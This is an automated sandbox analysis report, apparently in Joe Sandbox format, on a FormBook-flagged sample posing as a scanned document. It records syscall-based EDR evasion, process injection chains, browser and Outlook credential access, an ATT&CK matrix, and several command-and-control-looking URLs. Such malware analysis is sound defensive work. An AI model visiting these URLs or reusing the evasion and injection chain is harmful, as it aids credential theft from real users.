Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]	2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]	2_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]	2_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]	2_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]	2_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]	2_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]	2_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]	2_2_03852835

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00870B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00870B62

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00842622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00842622
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0083083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0083083F
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008309D5 SetUnhandledExceptionFilter,	0_2_008309D5
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00830C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00830C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\w32tm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\w32tm.exe

Thread register set: target process: 4424

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\w32tm.exe

Thread APC queued: target process: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D88008

Jump to behavior

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

0_2_00871201

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00852BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00852BA5

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0087B226 SendInput,keybd_event,

0_2_0087B226

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_008922DA

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe"	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Process created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

0_2_00870B62

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00871663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00871663

Source: rHP_SCAN_DOCUME.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: rHP_SCAN_DOCUME.exe, CdarBkjFTHWBQ.exe, 00000003.00000002.3918269232.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000000.1558856938.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705318764.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CdarBkjFTHWBQ.exe, 00000003.00000002.3918269232.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000000.1558856938.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705318764.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: CdarBkjFTHWBQ.exe, 00000003.00000002.3918269232.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000000.1558856938.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705318764.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: CdarBkjFTHWBQ.exe, 00000003.00000002.3918269232.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000000.1558856938.00000000017D0000.00000002.00000001.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705318764.0000000001431000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00830698 cpuid

0_2_00830698

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00888195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00888195

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0086D27A GetUserNameW,

0_2_0086D27A

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0084B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0084B952

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008142DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\w32tm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_81
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_XP
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_XPe
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_VISTA
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_7
Source: rHP_SCAN_DOCUME.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1635374918.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3921258002.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921287950.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3910307561.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1634925117.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3923632422.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635925426.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3921356109.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00891204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00891204
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00891806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00891806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rHP_SCAN_DOCUME.exe	31%	Virustotal		Browse
rHP_SCAN_DOCUME.exe	37%	ReversingLabs	Win32.Worm.DorkBot
rHP_SCAN_DOCUME.exe	100%	Avira	DR/AutoIt.Gen8
rHP_SCAN_DOCUME.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.811371bb10.buzz/ucix/?O2ePNNH0=PvAg9QCS6Z5JTHKcjy7JUmQHcUGckiODdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOLFU2gGDn9aYvOg0rFqJEB5O9KgryNVgV9zNl1vTlYWlaw==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.grimbo.boats/mjs1/?O2ePNNH0=GVh/hhHQVOm9lJhitzwoqNkD8zboxSkQHRopTNiRBkRajOiXgFH58ym0SPrYjBew4tr59NxCEDwYQ85isvQk4yZhvM15q69RepVJzrWBIP8UGaM9HjMvRNhgw0A0DI7CbA==&56-H=2t2xuzpX2	0%	Avira URL Cloud	safe
http://www.sovz.pro/vwha/?56-H=2t2xuzpX2&O2ePNNH0=+1TlPe1iHurJgrUo1Fh4jMYCUgN6dLJjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEjTjVAEexEL7h/EXKKKoC/rP/dgEVjb+3KEnGAuUy2xLnw==	0%	Avira URL Cloud	safe
http://www.sesanu.xyz/rf25/	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/y3ui/	0%	Avira URL Cloud	safe
